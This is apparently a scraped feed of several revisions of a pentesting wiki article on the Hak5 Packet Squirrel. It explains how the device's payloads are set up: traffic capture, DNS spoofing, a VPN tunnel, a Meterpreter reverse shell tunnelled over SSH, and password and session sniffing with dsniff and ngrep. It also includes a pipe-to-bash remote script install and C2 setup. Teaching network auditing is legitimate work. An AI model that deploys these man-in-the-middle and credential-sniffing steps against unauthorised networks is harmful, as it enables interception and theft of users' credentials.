[[File:Hak5 C2 start.jpg |thumb|right|400px||C2 server start]]&lt;br /&gt;
[[File:Hak5 c2 dashboard.jpg |thumb|right|400px||C2 Dashboard]]&lt;br /&gt;
[[File:Hak5 c2 sqirrel.jpg |thumb|right|400px||C2 Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
Here is an example for the usage of Squirrel Script.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Title: Caternet&lt;br /&gt;
# Author: Hak5Darren&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Description: Forwards all traffic to local webserver hosting cat photos.&lt;br /&gt;
# Props: In loving memory of Hak5Kerby&lt;br /&gt;
&lt;br /&gt;
LED SETUP&lt;br /&gt;
NETMODE NAT&lt;br /&gt;
echo &amp;quot;address=/#/172.16.32.1&amp;quot; &amp;gt; /tmp/dnsmasq.address&lt;br /&gt;
/etc/init.d/dnsmasq restart&lt;br /&gt;
&lt;br /&gt;
LED ATTACK&lt;br /&gt;
iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53&lt;br /&gt;
python -m SimpleHTTPServer 80&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
For more information go to the [https://docs.hak5.org/hc/en-us/sections/360002180414-Payload-Development hak5.org webpage].&lt;br /&gt;
&lt;br /&gt;
== with Cloud C2 ==&lt;br /&gt;
&lt;br /&gt;
The [[Hak5 Cloud C2]] is a command and control server for Hak5 devices. Installation and startup is shown in figure &amp;quot;C2 server start&amp;quot;. By browsing to the configured address you can login to the dashboard, shown in figure &amp;quot;C2 dashboard&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
To connect the Packet Squirrel with your C2 Cloud, click on the plus button in the lower right corner and choose the device. On the dashboard, open the added device and click on Setup, as shown in figure &amp;quot;C2 Packet Sqirrel&amp;quot;. Then copy the downloaded file to the Packet Squirrel&#039;s /etc folder and reboot it. &lt;br /&gt;
In the Overview tab you can also Edit, Reboot, Wipe and Remove your device. &lt;br /&gt;
&lt;br /&gt;
In the Clients tab you can see all clients which were connected to your Packet Squirrel with hostname, MAC and IP address. In the Loot tab, you can open the current loot from your Packet Squirrel directly on your C2 server. And in the Terminal tab you can open a ssh session to your device.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360000982574-Packet-Squirrel&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360001177114-Cloud-C2&lt;br /&gt;
* https://downloads.hak5.org/&lt;br /&gt;
&lt;br /&gt;
[[Category:Pentesting]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6096</id>
		<title>Hak5 Packet Squirrel</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6096"/>
		<updated>2021-03-09T15:34:59Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* Summary */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
[[File:Packet Squirrel Connectors.jpg |thumb|right|400px||Packet Squirrel device]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel operates as an Ethernet Man in the Middle and comes  preloaded with three exploit scripts. These three attack modes are Logging Network Traffic, Spoofing DNS and OpenVPN Tunnel. These can also be modified and exchanged with other scripts. It&#039;s stealthy pocket-size enables it to be placed without notice, this can come in handy for penetration testers. The efficient energy usage makes it possible to power it with a battery pack to run over a week.&lt;br /&gt;
The Packet Squirrel can also be combined with the [[Hak5 Cloud C2]], a command and control server specially for Hak5 devices.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
[[File:Hak5_Squirrel_version.jpg|thumb|right|400px||SSH connect]]&lt;br /&gt;
[[File:Hak5_Squirrel_spoofhost.jpg|thumb|right|400px||spoofhost file]]&lt;br /&gt;
[[File:Hak5_Squirrel_browser.jpg|thumb|right|400px||Spoofed browser warning]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel has an switch to choose between the three exploit payloads for logging the TCP dump, Using VPN Tunnelling and for DNS spoofing, or Arming Mode.&lt;br /&gt;
 &lt;br /&gt;
In &#039;&#039;&#039;Arming Mode&#039;&#039;&#039; (switch in 4th position, nearest to the USB port) you can easily access the device with ssh &amp;lt;code&amp;gt;root@172.16.32.1&amp;lt;/code&amp;gt; with the password &amp;lt;code&amp;gt;hak5squirrel&amp;lt;/code&amp;gt;. Therefore Packet Squirrel acts as DHCP server. If you don&#039;t get an IP address, manually configure an IP from the 172.16.32.0/24 network on your ethernet interface. Arming Mode is indicated by a blue blinking LED an allows to configure the different payloads.&lt;br /&gt;
&lt;br /&gt;
It is also possible to gain ssh access to the device during the attack modes with the IP address of the outgiong Ethernet interface as well.    &lt;br /&gt;
&lt;br /&gt;
==== Basic Cable Setup ====&lt;br /&gt;
&lt;br /&gt;
# Plug the victims Ethernet cable into the &amp;quot;Ethernet In&amp;quot; Port&lt;br /&gt;
# Plug the gateway Ethernet cable  into the &amp;quot;Ethernet Out&amp;quot; Port&lt;br /&gt;
# Power the device by plugging in the power cable&lt;br /&gt;
&lt;br /&gt;
==== Firmware Upgrade ====&lt;br /&gt;
&lt;br /&gt;
Shiped devices are installed with version 1.0, which can be seen in the VERSION file in the Packet Squirrel root folder. The current version 3.2 can be downloaded from the Hak5 website.&lt;br /&gt;
&lt;br /&gt;
The file has to be named upgrade-version.bin (where version stands for the version number) and copied to the root directory of an NTFS or EXT4 formatted USB drive.&lt;br /&gt;
&lt;br /&gt;
Plug in the USB drive in the Packet Squirrel and set the select switch to Arming Mode. Then power on the Packet Squirrel. &lt;br /&gt;
&lt;br /&gt;
The upgrade process needs 5 minutes and is indicated by a solid red or blue LED light. When the firmware upgrade is finished, Packet Squirrel reboots and goes in Arming Mode. Shown by a blud blinking LED. &lt;br /&gt;
&lt;br /&gt;
Then you can connect again with SSH and verify the new version, shown in Figure &amp;quot;SSH connect&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
== Payloads ==&lt;br /&gt;
&lt;br /&gt;
=== Logging Network Traffic ===&lt;br /&gt;
&lt;br /&gt;
This mode creates TCP/UDP dumps and saves them on the USB drive to analyse later on.&lt;br /&gt;
Just follow these easy steps:&lt;br /&gt;
&lt;br /&gt;
# A USB Stick with an NTFS file system needs to be plugged in the USB-A Port before the Squirrel is Powered up. &lt;br /&gt;
# Flip the first position (which is nearest to the micro USB power in).&lt;br /&gt;
# Connect the Ethernet cable of the victim into the Ethernet port, which is at the same side as the power in USB connector and Connect the Gateway Ethernet cable to the other Port.&lt;br /&gt;
# Plug the power cable in and wait the one minute long start up sequence. The device can be either powered by the victim machine or by an USB power bank.&lt;br /&gt;
# The data traffic will be captured, if the LED starts blinking Yellow. If otherwise the LED circles between red, green and blue, then the USB stick has the wrong file system.&lt;br /&gt;
# Stop the capturing process by pressing the Button. Then the device takes some seconds to write the tcpdum to the USB Storage. As soon as the LED glows red the saving process has ended and you are good to go.&lt;br /&gt;
# You can now analyse the captured pcap file, located in \loot\tcpdump with [[Wireshark]].&lt;br /&gt;
&lt;br /&gt;
After that, the connection trough the Packet Squirrel is shut down. To allow the client to connect to the network again, Packet Squirrel has to be rebooted.&lt;br /&gt;
&lt;br /&gt;
=== DNS Spoofing Mode ===&lt;br /&gt;
&lt;br /&gt;
This mode spoofs the client with DNS entries to redirect traffic to other IP addresses.&lt;br /&gt;
&lt;br /&gt;
# For this mode we have to start in arming mode (switch at fourth position)&lt;br /&gt;
# After gaining access with ssh we change to the DNS spoofing directory with &amp;lt;code&amp;gt;cd /payloads/switch2&amp;lt;/code&amp;gt;.&lt;br /&gt;
# There we can define the Spoofed domain names by editing the file spoofhost with &amp;lt;code&amp;gt;nano spoofhost&amp;lt;/code&amp;gt;.&lt;br /&gt;
# In the file add entrys like &amp;lt;code&amp;gt;address=/myspoofdomain.at/194.232.104.140&amp;lt;/code&amp;gt; as shown in figure &amp;quot;spoofhost file&amp;quot;. The example IP belongs to orf.at&lt;br /&gt;
# Unplug the Packet Squirrel and shift the switch to the second position.&lt;br /&gt;
# Plug it in and wait until the startup sequence is finished and the LED starts blinking yellow.&lt;br /&gt;
&lt;br /&gt;
By browsing to the spoofed domain, the request gets redirected to the given IP. As shown in figure &amp;quot;Spoofed browser warning&amp;quot; browsers show certificate alerts because the domain and certificate do not match. But this mode can still be used to attack other applications which use domains with no validation.&lt;br /&gt;
&lt;br /&gt;
=== OpenVPN Mode ===&lt;br /&gt;
[[File:Packet Squirrel VPN1.jpg |thumb|right|400px||OpenVPN Access Mode]]&lt;br /&gt;
[[File:Packet Squirrel VPN2.jpg |thumb|right|400px||OpenVPN Tunneling Mode]]&lt;br /&gt;
&lt;br /&gt;
The VPN payload implements VPN access mode and VPN tunnelling mode. &lt;br /&gt;
If you want to Setup your own OpenVPN (OVPN) server follow the instructions at the [https://docs.hak5.org/hc/en-us/articles/360010554013-OpenVPN-Payload hak5 webpage]. For the purpose of testing we use use an existing server from [https://www.freeopenvpn.org/en/ freeopenvpn.org]. &lt;br /&gt;
# Start by selecting the desired server and download the the OVPN access certificate.&lt;br /&gt;
# Set the Packet Squirrel in Arming Mode and connect to its shell&lt;br /&gt;
# Copy the certificate with &amp;lt;code&amp;gt;scp user@server:downloadfolder/filename.ovpn /root/payloads/switch3/config.ovpn&amp;lt;/code&amp;gt;&lt;br /&gt;
# Steer to the directory with &amp;lt;code&amp;gt; cd /root/payloads/switch3/&amp;lt;/code&amp;gt;&lt;br /&gt;
# Edit the config.ovpn at line 30 to &amp;lt;code&amp;gt;auth-user-pass credentials.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
# Add an credentials file with  &amp;lt;code&amp;gt; nano credentials.txt&amp;lt;/code&amp;gt; and add the two lines:&lt;br /&gt;
## &amp;lt;code&amp;gt;freeopenvpn&amp;lt;/code&amp;gt; &lt;br /&gt;
## &amp;lt;code&amp;gt;&amp;lt;the displayed password&amp;gt;&amp;lt;/code&amp;gt; &lt;br /&gt;
# Before starting the VPN we choose the VPN mode:&lt;br /&gt;
## Open the &amp;lt;code&amp;gt;payload.sh&amp;lt;/code&amp;gt; &lt;br /&gt;
## Set the &amp;lt;code&amp;gt;For_Clients=&amp;lt;/code&amp;gt;  to&lt;br /&gt;
### &amp;lt;code&amp;gt;0&amp;lt;/code&amp;gt; for Access Mode&lt;br /&gt;
### &amp;lt;code&amp;gt;1&amp;lt;/code&amp;gt; for Tunneling Mode&lt;br /&gt;
# Now set the Switch the the third Position and plug power out and in again&lt;br /&gt;
# You are good to go, if the yellow LED starts to flash after the boot up sequence  &lt;br /&gt;
==== Access Mode ====&lt;br /&gt;
&lt;br /&gt;
Access mode allows the squirrel to access the VPN Network via the Secure Shell&lt;br /&gt;
If the connection was established if the command &amp;lt;code&amp;gt;ifconfig tun0&amp;lt;/code&amp;gt; show the following output when it is issued at the Packet Squirrels Shell.&lt;br /&gt;
 tun0 &lt;br /&gt;
      Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00&lt;br /&gt;
      inet addr:192.168.231.245 P-t-P:192.168.231.245 Mask:255.255.255.0&lt;br /&gt;
      UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1&lt;br /&gt;
      RX packets:12 errors:0 dropped:0 overruns:0 frame:0&lt;br /&gt;
      TX packets:8 errors:0 dropped:0 overruns:0 carrier:0&lt;br /&gt;
      collisions:0 txqueuelen:100&lt;br /&gt;
      RX bytes:1404 (1.3 KiB) TX bytes:608 (608.0 B)&lt;br /&gt;
&lt;br /&gt;
The Access Mode can be used to access an Private network that is used for testing and pen testing purposes like an honeypot virtual machine.&lt;br /&gt;
&lt;br /&gt;
==== Tunneling Mode ====&lt;br /&gt;
&lt;br /&gt;
The Tunnelling mode encapsulates all the traffic and sends it to the VPN Server, from where it is send to the internet. VPN Tunnelling allows users to disguise their IP address you can check your current IP address with [https://www.ipchicken.com ipchicken.com].&lt;br /&gt;
&lt;br /&gt;
You can also install an simple openVPN Server on a linux machine with&lt;br /&gt;
&amp;lt;code&amp;gt;wget https://git.io/vpn -O openvpn.sh &amp;amp;&amp;amp; bash openvpn.sh&amp;lt;/code&amp;gt;&lt;br /&gt;
and press Enter 6 times.&lt;br /&gt;
Then copy the generated client.ovpn file to Packet Squirrel in the /payload/switch3 folder and restart it with the switch on third position.&lt;br /&gt;
=== Meterpreter-via-SSH ===&lt;br /&gt;
[[File:Packet squirrel meterpreter ssh.PNG |thumb|right|400px||Packet Squirrel Payload Meterpreter-via-SSH settings]]&lt;br /&gt;
This payload starts the Packet Squirrel in NAT mode and waits for user input. When the button is pressed, the payload connects to a remote SSH server and creates a local port tunnel. It then launches a meterpreter shell over the tunnel.&lt;br /&gt;
The intent is to hide the meterpreter network traffic behind a legitimate SSH activity.&lt;br /&gt;
You can download this payload from the offical [https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/remote-access/Meterpreter-via-SSH hak5 github].&lt;br /&gt;
==== Getting Started ====&lt;br /&gt;
Copy the playload to the Packet Squirrel into the desired switch folder. Now edit the scirpt to configure your server  options:&lt;br /&gt;
* SSH_USER - username on remote SSH server&lt;br /&gt;
* SSH_HOST - ip address of remote SSH Server&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; If you changed the default meterpreter port don&#039;t forget to change it on the metasploit side as well.&lt;br /&gt;
* MSF_PORT&lt;br /&gt;
&lt;br /&gt;
===== Generate SSH Key on Squirrel =====&lt;br /&gt;
Now you have to generate an ssh key-pair (just use default location and empty password) on your Packet Squirrel:&lt;br /&gt;
 root@squirrel:~# ssh-keygen&lt;br /&gt;
===== Allow Squirrel on SSH Server =====&lt;br /&gt;
Then you have to copy the contents of /root/.ssh/id_rsa.pub from Packet Squirrel to the SSH Server authorized file:&lt;br /&gt;
&lt;br /&gt;
 user@server:~# mkdir ~/.ssh&lt;br /&gt;
 user@server:~# echo &#039;paste id_rsa.pub contents inside this quote&#039; &amp;gt; ~/.ssh/authorized_keys&lt;br /&gt;
===== Run Metasploit with Resource =====&lt;br /&gt;
 msf@server:~# msfconsole -r server.rc&lt;br /&gt;
&lt;br /&gt;
==== LED Definitions ====&lt;br /&gt;
# Configure NETMODE&lt;br /&gt;
#* Solid Magenta&lt;br /&gt;
# Connect to SSH Server&lt;br /&gt;
#* SUCCESS - Blink Amber 5 Times&lt;br /&gt;
#* FAIL - Blink Red 2 Times&lt;br /&gt;
# Launch meterpreter&lt;br /&gt;
#* SUCESS - Blink Cyan 1 Time&lt;br /&gt;
#* FAIL - Blink Red 1 Time&lt;br /&gt;
&lt;br /&gt;
==== Hardening Recommendations ====&lt;br /&gt;
# Use an accout with limited privileges for SSH acces on the server.&lt;br /&gt;
# User a dedicated account for Packet Squirrel device (audit usage with SSH access logs).&lt;br /&gt;
# Disable PasswordAuthentication in sshd_config on the server.&lt;br /&gt;
&lt;br /&gt;
=== ISpyintel ===&lt;br /&gt;
[[File:Packet squirrel ispyintel.PNG |thumb|right|400px||Packet Squirrel Payload ISpyIntel settings]]&lt;br /&gt;
This payload will automate gathering various recon data on whatever passes between it&#039;s Ethernet ports. You can download this payload from the [https://github.com/hak5/packetsquirrel-payloads/tree/master/payloads/library/sniffing/ispyintel official hak5 github].&lt;br /&gt;
&#039;&#039;&#039;Note:&#039;&#039;&#039; This payload requires a usb stick to store loot.&lt;br /&gt;
==== Setup ====&lt;br /&gt;
# Edit the config variables at the top. The main variables are:&lt;br /&gt;
## &amp;lt;code&amp;gt;lootPath=&amp;quot;/mnt/loot/intel&amp;quot;  # Path to loot&amp;lt;/code&amp;gt;&lt;br /&gt;
## &amp;lt;code&amp;gt;mode=&amp;quot;TRANSPARENT&amp;quot;          # Network mode we want to use&amp;lt;/code&amp;gt;&lt;br /&gt;
## &amp;lt;code&amp;gt;interface=&amp;quot;br-lan&amp;quot;          # Interface to listen on&amp;lt;/code&amp;gt;&lt;br /&gt;
# Copy payload.sh into the ~/payloads/switch folder you wish to deploy on.&lt;br /&gt;
# Connect into a target machine with access to the LAN.&lt;br /&gt;
# Set switch to the spot and power up.&lt;br /&gt;
# Leave, get coffee, take a nap while everything is recorded and parsed for future use.&lt;br /&gt;
# When done; hit the button. The LED will rapidly flash white to let you know it is finishing up.&lt;br /&gt;
# When all is done the LED will just go blank. It is now safe to unplug and go about your day.&lt;br /&gt;
&lt;br /&gt;
==== Tasks that are started ====&lt;br /&gt;
* tcpdump - records every packet that was send and received&lt;br /&gt;
* urlsnarf - collects all websites that were visited&lt;br /&gt;
* dsniff - attempts to acquire passwords and what not&lt;br /&gt;
* ngrep - on ports 80 and 21 with the filter for common password fields&lt;br /&gt;
* ngrep - on ports 80 and 21 with the filter for common session id fields&lt;br /&gt;
* log.txt - logs the progress of the payload for troubleshooting&lt;br /&gt;
&lt;br /&gt;
==== Clean Up ====&lt;br /&gt;
Once the button is pressed the payload will automatically parse the TCPDump log file for the following items and store the results in seperate files.&lt;br /&gt;
As this process can take some time the LED will change to a rapid white blink letting you know the button command was recieved and the payload is in the process of shutting down.&lt;br /&gt;
* ipv4found.txt Will contain a unique list of all the ipv4 which the pcap file contains&lt;br /&gt;
* maybeEmails.txt Is a very loose search for possible email addresses that came across the wire in plain text.&lt;br /&gt;
&lt;br /&gt;
=== Creating your own Payloads ===&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel allows us to create our own attack payloads by loading them to the USB stick and naming them Switch1 to Switch3.&lt;br /&gt;
It allows as to create payload in python, bash or PHP. For Python and Bash it is important to use the interpreter directive Python: &amp;lt;code&amp;gt;#!/usr/bin/python&amp;lt;/code&amp;gt;, bash: &amp;lt;code&amp;gt;#!/usr/bin/bash&amp;lt;/code&amp;gt;.&lt;br /&gt;
Bash scripts can access the following pre-installed tools:&lt;br /&gt;
openvpn, autossh, tcpdump, meterpreter-https, cron, nmap, ncat-ssl, ncat, sshfs, tcpdump and wget&lt;br /&gt;
&lt;br /&gt;
The featured Squirrel Script offers the following additional commands:&lt;br /&gt;
&lt;br /&gt;
* NETMODE&lt;br /&gt;
specifies which network mode Packet Sqirrel uses and how traffic is routed&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Command !! Description&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE BRIDGE || Creates a bridge between the IN and OUT ehternet interface, with an own IP address for Packet Sqirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE TRANSPARENT || Also creates a bridge between the interfaces but with no own IP address&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE NAT || Packet Squirrel gets an IP address from the target network, the client gets an IP from Packet Squirrel&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE VPN || same es NAT with VPN interface for client tunneling&lt;br /&gt;
|-&lt;br /&gt;
| NETMODE CLONE || Clones the MAC address from the target client and uses it to connect to the LAN&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* LED&lt;br /&gt;
with this command the multi-color LED can be controlled &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! Possible configurations !! Description&lt;br /&gt;
|-&lt;br /&gt;
| LED Colors || red, green, blue, yellow, cyan, magenta, white&lt;br /&gt;
|-&lt;br /&gt;
| LED Patterns || SOLID, SLOW, FAST, SINGLE, DOUBLE, TRIPLE, SUCCESS, 1-10000&lt;br /&gt;
|-&lt;br /&gt;
| LED State || SETUP, FAIL, ATTACK, STAGE, SPECIAL, CLEANUP, FINISH&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* BUTTON&lt;br /&gt;
The BUTTON command pauses the paylpoad until the hardware button is pressed or a specified time has passed&lt;br /&gt;
&lt;br /&gt;
* SWITCH&lt;br /&gt;
The SWITCH command returns the current position of the hardware payload selection switch. Output is &amp;quot;switch1&amp;quot;, &amp;quot;switch2&amp;quot;, &amp;quot;switch3&amp;quot; or &amp;quot;switch4&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
==== Example ====&lt;br /&gt;
[[File:Hak5 C2 start.jpg |thumb|right|400px||C2 server start]]&lt;br /&gt;
[[File:Hak5 c2 dashboard.jpg |thumb|right|400px||C2 Dashboard]]&lt;br /&gt;
[[File:Hak5 c2 sqirrel.jpg |thumb|right|400px||C2 Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
Here is an example for the usage of Squirrel Script.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Title: Caternet&lt;br /&gt;
# Author: Hak5Darren&lt;br /&gt;
# Version: 1.0&lt;br /&gt;
# Description: Forwards all traffic to local webserver hosting cat photos.&lt;br /&gt;
# Props: In loving memory of Hak5Kerby&lt;br /&gt;
&lt;br /&gt;
LED SETUP&lt;br /&gt;
NETMODE NAT&lt;br /&gt;
echo &amp;quot;address=/#/172.16.32.1&amp;quot; &amp;gt; /tmp/dnsmasq.address&lt;br /&gt;
/etc/init.d/dnsmasq restart&lt;br /&gt;
&lt;br /&gt;
LED ATTACK&lt;br /&gt;
iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53&lt;br /&gt;
python -m SimpleHTTPServer 80&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
For more information go to the [https://docs.hak5.org/hc/en-us/sections/360002180414-Payload-Development hak5.org webpage].&lt;br /&gt;
&lt;br /&gt;
== with Cloud C2 ==&lt;br /&gt;
&lt;br /&gt;
The [[Hak5 Cloud C2]] is a command and control server for Hak5 devices. Installation and startup is shown in figure &amp;quot;C2 server start&amp;quot;. By browsing to the configured address you can login to the dashboard, shown in figure &amp;quot;C2 dashboard&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
To connect the Packet Squirrel with your C2 Cloud, click on the plus button in the lower right corner and choose the device. On the dashboard, open the added device and click on Setup, as shown in figure &amp;quot;C2 Packet Sqirrel&amp;quot;. Then copy the downloaded file to the Packet Squirrel&#039;s /etc folder and reboot it. &lt;br /&gt;
In the Overview tab you can also Edit, Reboot, Wipe and Remove your device. &lt;br /&gt;
&lt;br /&gt;
In the Clients tab you can see all clients which were connected to your Packet Squirrel with hostname, MAC and IP address. In the Loot tab, you can open the current loot from your Packet Squirrel directly on your C2 server. And in the Terminal tab you can open a ssh session to your device.&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Packet Squirrel]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360000982574-Packet-Squirrel&lt;br /&gt;
* https://docs.hak5.org/hc/en-us/categories/360001177114-Cloud-C2&lt;br /&gt;
* https://downloads.hak5.org/&lt;br /&gt;
&lt;br /&gt;
[[Category:Pentesting]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6095</id>
		<title>Hak5 Packet Squirrel</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Hak5_Packet_Squirrel&amp;diff=6095"/>
		<updated>2021-03-09T15:23:48Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: /* Meterpreter-via-SSH */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
[[File:Packet Squirrel Connectors.jpg |thumb|right|400px||Packet Squirrel device]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel operates as an Ethernet Man in the Middle and comes  preloaded with three exploit scripts. These three attack modes are Logging Network Traffic, Spoofing DNS and OpenVPN Tunnel. These can also be modified and exchanged with other scripts. &lt;br /&gt;
The Packet Squirrel can also be combined with the [[Hak5 Cloud C2]], a command and control server specially for Hak5 devices.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
[[File:Hak5_Squirrel_version.jpg|thumb|right|400px||SSH connect]]&lt;br /&gt;
[[File:Hak5_Squirrel_spoofhost.jpg|thumb|right|400px||spoofhost file]]&lt;br /&gt;
[[File:Hak5_Squirrel_browser.jpg|thumb|right|400px||Spoofed browser warning]]&lt;br /&gt;
&lt;br /&gt;
The Packet Squirrel has an switch to choose between the three exploit payloads for logging the TCP dump, Using VPN Tunnelling and for DNS spoofing, or Arming Mode.&lt;br /&gt;
 &lt;br /&gt;
In &#039;&#039;&#039;Arming Mode&#039;&#039;&#039; (switch in 4th position, nearest to the USB port) you can easily access the device with ssh &amp;lt;code&amp;gt;root@172.16.32.1&amp;lt;/code&amp;gt; with the password &amp;lt;code&amp;gt;hak5squirrel&amp;lt;/code&amp;gt;. Therefore Packet Squirrel acts as DHCP server. If you don&#039;t get an IP address, manually configure an IP from the 172.16.32.0/24 network on your ethernet interface. Arming Mode is indicated by a blue blinking LED an allows to configure the different payloads.&lt;br /&gt;
&lt;br /&gt;
It is also possible to gain ssh access to the device during the attack modes with the IP address of the outgiong Ethernet interface as well.    &lt;br /&gt;
&lt;br /&gt;
==== Basic Cable Setup ====&lt;br /&gt;
&lt;br /&gt;
# Plug the victims Ethernet cable into the &amp;quot;Ethernet In&amp;quot; Port&lt;br /&gt;
# Plug the gateway Ethernet cable  into the &amp;quot;Ethernet Out&amp;quot; Port&lt;br /&gt;
# Power the device by plugging in the power cable&lt;br /&gt;
&lt;br /&gt;
==== Firmware Upgrade ====&lt;br /&gt;
&lt;br /&gt;
Shiped devices are installed with version 1.0, which can be seen in the VERSION file in the Packet Squirrel root folder. The current version 3.2 can be downloaded from the Hak5 website.&lt;br /&gt;
&lt;br /&gt;
The file has to be named upgrade-version.bin (where version stands for the version number) and copied to the root directory of an NTFS or EXT4 formatted USB drive.&lt;br /&gt;
&lt;br /&gt;
Plug in the USB drive in the Packet Squirrel and set the select switch to Arming Mode. Then power on the Packet Squirrel. &lt;br /&gt;
&lt;br /&gt;
The upgrade process needs 5 minutes and is indicated by a solid red or blue LED light. When the firmware upgrade is finished, Packet Squirrel reboots and goes in Arming Mode. Shown by a blud blinking LED. &lt;br /&gt;
&lt;br /&gt;
Then you can connect again with SSH and verify the new version, shown in Figure &amp;quot;SSH connect&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
== Payloads ==&lt;br /&gt;
&lt;br /&gt;
=== Logging Network Traffic ===&lt;br /&gt;
&lt;br /&gt;
This mode creates TCP/UDP dumps and saves them on the USB drive to analyse later on.&lt;br /&gt;
Just follow these easy steps:&lt;br /&gt;
&lt;br /&gt;
# A USB Stick with an NTFS file system needs to be plugged in the USB-A Port before the Squirrel is Powered up. &lt;br /&gt;
# Flip the first position (which is nearest to the micro USB power in).&lt;br /&gt;
# Connect the Ethernet cable of the victim into the Ethernet port, which is at the same side as the power in USB connector and Connect the Gateway Ethernet cable to the other Port.&lt;br /&gt;
# Plug the power cable in and wait the one minute long start up sequence. The device can be either powered by the victim machine or by an USB power bank.&lt;br /&gt;
# The data traffic will be captured, if the LED starts blinking Yellow. If otherwise the LED circles between red, green and blue, then the USB stick has the wrong file system.&lt;br /&gt;
# Stop the capturing process by pressing the Button. Then the device takes some seconds to write the tcpdum to the USB Storage. As soon as the LED glows red the saving process has ended and you are good to go.&lt;br /&gt;
# You can now analyse the captured pcap file, located in \loot\tcpdump with [[Wireshark]].&lt;br /&gt;
&lt;br /&gt;
After that, the connection trough the Packet Squirrel is shut down. To allow the client to connect to the network again, Packet Squirrel has to be rebooted.&lt;br /&gt;
&lt;br /&gt;
=== DNS Spoofing Mode ===&lt;br /&gt;
&lt;br /&gt;
This mode spoofs the client with DNS entries to redirect traffic to other IP addresses.&lt;br /&gt;
&lt;br /&gt;
# For this mode we have to start in arming mode (switch at fourth position)&lt;br /&gt;
# After gaining access with ssh we change to the DNS spoofing directory with &amp;lt;code&amp;gt;cd /payloads/switch2&amp;lt;/code&amp;gt;.&lt;br /&gt;
# There we can define the Spoofed domain names by editing the file spoofhost with &amp;lt;code&amp;gt;nano spoofhost&amp;lt;/code&amp;gt;.&lt;br /&gt;
# In the file add entrys like &amp;lt;code&amp;gt;address=/myspoofdomain.at/194.232.104.140&amp;lt;/code&amp;gt; as shown in figure &amp;quot;spoofhost file&amp;quot;. The example IP belongs to orf.at&lt;br /&gt;
# Unplug the Packet Squirrel and shift the switch to the second position.&lt;br /&gt;
# Plug it in and wait until the startup sequence is finished and the LED starts blinking yellow.&lt;br /&gt;
&lt;br /&gt;
By browsing to the spoofed domain, the request gets redirected to the given IP. As shown in figure &amp;quot;Spoofed browser warning&amp;quot; browsers show certificate alerts because the domain and certificate do not match. But this mode can still be used to attack other applications which use domains with no validation.&lt;br /&gt;
&lt;br /&gt;
=== OpenVPN Mode ===&lt;br /&gt;
[[File:Packet Squirrel VPN1.jpg |thumb|right|400px||OpenVPN Access Mode]]&lt;br /&gt;
[[File:Packet Squirrel VPN2.jpg |thumb|right|400px||OpenVPN Tunneling Mode]]&lt;br /&gt;
&lt;br /&gt;
The VPN payload implements VPN access mode and VPN tunnelling mode. &lt;br /&gt;
